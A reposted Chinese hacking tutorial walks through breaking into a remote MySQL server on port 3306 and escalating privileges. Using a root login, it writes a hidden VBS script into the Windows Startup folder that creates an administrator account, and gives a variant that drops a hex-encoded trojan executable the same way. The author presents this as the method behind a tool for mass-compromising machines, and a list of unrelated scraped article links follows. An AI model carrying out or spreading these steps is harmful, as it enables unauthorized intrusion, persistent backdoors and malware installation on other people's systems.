来源:飓风网络安全

作者:钊涣

原址:http://mp.weixin.qq.com/s/PR1KctJzKPGytNPPrU39uA

1、连接到对方MYSQL 服务器。首先你要下载

下载下来然后解压到C盘根目录,找到MySQL-5.1.50这个文件夹,再打开bin文件夹

1、打开本地cmd命令提示框,输入命令

cd C:\MySQL-5.1.50\bin 意思就是进入当前目录。然后就可以输入mysql命令了。

然后输入:

mysql -u 目标用户名,3306默认是root -h 目标ip地址 -p 回车

例如:

mysql -u root -h 192.168.0.1 -p

2、让我们来看看服务器中有些什么数据库:

show databases; 注意分号,不要删除 回车

MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

use test; 注意分号,不要删除 回车

我们将会进入test数据库中

4、查看我们进入数据库中有些什么数据表:

show tables; 注意分号,不要删除 回车

默认的情况下,test中没有任何表的存在。以下为关键的部分

5、在TEST数据库下创建一个新的表;

create table a (cmd text); 注意分号,不要删除 回车

默认的情况下,test中没有任何表的存在。

好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

6、在表中插入内容

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

注意分号,不要删除 回车,继续下一步

insert into a values ("a=wshshell.run (""cmd.exe /c net user 8090 8090/add"",0) " );

注意分号,不要删除 回车,继续下一步

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 8090 /add"",0) " );

回车

注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!

7、好了,现在我们来看看表a中有些什么

select * from a;注意分号,不要删除 回车,继续下一步

我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,

我们来到下一步

8、输出表为一个VBS的脚本文件

select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";

回车,如果显示No such file or directory 就是失败了,“大意:没有这样的文件或目录”

那就试试:

select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs";

我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“\"符号。

9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,

因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!

本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!

好了,找个

最后附两张张提权过程图,怕新手懵逼。(图片 单机放大!)

详细讲解:

提权结束

8、小科普,其实还可以这样写:

create table a (cmd BLOB);insert into a values (CONVERT(木马的16进制代码,CHAR));select * from a into dumpfile ’C://Documents and Settings//All Users//「开始」菜单//程序/启动//mm.exe’drop table a;

执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是//,因为windows会自动过滤掉一个/

注:这就是3306抓鸡工具的运行原理

本文转载于微信公众号: 电子物证(ewuzheng),更多微信文章请扫描关注公众号:

Tag标签:

f4小组专用3306mysql抓鸡工具_【技术】3306端口手动入侵之mysql写入启动项提权相关推荐

  1. mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲

    本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...

  2. python抓包工具_「docker实战篇」python的docker爬虫技术-fiddler抓包软件详细配置(七)...

    挑选常用的功能给各位老铁介绍下. fiddler第一次进入fiddlerfiddler会请求fiddler的官网,检查更新操作布局分布 工具栏File -capture traffic开启爬虫File ...

  3. python爬虫抓包工具_「docker实战篇」python的docker爬虫技术-fiddler抓包软件详细配置(七)...

    挑选常用的功能给各位老铁介绍下. fiddler 第一次进入fiddler fiddler会请求fiddler的官网,检查更新操作 布局分布 工具栏 File -capture traffic 开启爬 ...

  4. python网络抓包工具_抓包工具 Charles 用法详解

    前言 抓包工具第一篇文章我们讲过,主要有 Charles 和 Fiddler,关于 Fiddler 抓包 APP 的,我之前写过一篇文章:Fiddler抓包APP教程,Fiddler 抓包 App 请 ...

  5. 百度关键词抓取工具_百度网站关键词最蜘蛛快排 - 关于网站网站死链

    原出处:最蜘蛛快排 原文链接:http://seo.zuizhizhu.com 百度网站关键词最蜘蛛快排 seo.zuizhizhu.com 网站关键词快速排名优化,支持百度快速排名,搜狗快速排名,3 ...

  6. dell进入u盘启动模式_戴尔如何进入bios设置u盘启动项?

    在快启动我们有很多文章说到了戴尔具体型号机子的U盘启动设置说明,比如戴尔灵越14 7000笔记本电脑u盘启动设置.其中大部分戴尔电脑的U盘启动设置都是相同的,因此这篇文章可以作为设置的参考来进行查看. ...

  7. 系统检测到您正在使用网页抓取工具_【安全】58反抓取简介

    0x00 介绍 网络爬虫,常又被称呼为Spider,网络机器人,主要模拟网络交互协议,长时间,大规模的获取目标数据. 普通爬虫会从网站的一个链接开始,不断收集网页资源,同时不断延伸抓取新获取的URL以 ...

  8. 百度关键词抓取工具_阿里巴巴国际站运营关键词抓取工具

    没时间更新,分享我常用的收集竞争对手关键词的工具.大家可以直接用在TOP10的店铺上,这样你就知道人家的关键词是如何布局和设置的.截图: 就挂着让它自己慢慢生成就可以了,简单粗暴. 生成表格后如何整理 ...

  9. app抓包工具_抓包助手app下载安装_抓包助手软件最新版免费下载

    Packet Capture Assistant是一个Android数据包捕获工具软件,可在移动终端上执行自动实时信令数据包捕获和信令分析分析,并在服务器端自动分析APP交互过程. 软件介绍 数据包捕 ...

  10. Charles抓包工具_基本功能

    原文来自:https://www.cnblogs.com/sjl179947253/p/10326792.html 一. 安装及破解 1. 安装: 下载地址:http://www.charlespro ...

最新文章

  1. Python实现的导弹跟踪算法,燃!
  2. 配置React项目的运行环境
  3. OSGI和Spring动态模块–简单的Hello World
  4. 如何去掉DataTable中的重复行(新增.net 2.0中最新解决方法---简便)
  5. OpenJudge NOI 1.2 05:填空:类型转换2
  6. php psockopen,基于php socket(fsockopen)的应用实例分析
  7. Silverlight4Beta之与剪切板通信
  8. [转载] python创建集合set()_Python 集合set()
  9. docker安装指定版本的tag镜像
  10. 一款比PowerDesigner好用的uml建模工具chiner
  11. CAS (4) —— CAS浏览器SSO访问顺序图详解(CAS Web Flow Diagram by Example)
  12. 99道python测试题
  13. 搭建asp会议签到系统:第一章 账密登录
  14. 下列关于python运算符的使用描述正确的是_以下关于 Python 字符串的描述中,正确的是( )...
  15. linux vim编辑器剪切,Linux下Vim编辑器访问系统剪切板
  16. js中unload什么意思_jQuery - unload事件处理
  17. NUC-lib资源学习
  18. 百度地图自定义图标icon 添加本地图片无法显示问题解决
  19. c语言 w 的作用,C语言当中文件W什么意思?
  20. 统计大写的辅音字母 C语言

热门文章

  1. 小米路由器mini WOL网络唤醒插件
  2. RHEL6配置yum源为网易镜像
  3. ORACLE P6 21.12 系统虚拟机(VM)分享
  4. 想做影视“化妆师”,首先要知道影视后期调色的8个基本步骤!
  5. 子进程 已安装 pre-removal 脚本 返回了错误号 1或2 解决办法:
  6. Scratch3 优化,开启压缩,提高访问速度
  7. 微信小程序使用字体图标库
  8. ios社交app源码_iOS中的社交媒体集成
  9. 黑苹果小兵clover目录及驱动介绍
  10. MySQL和数据库可视化工具的下载与安装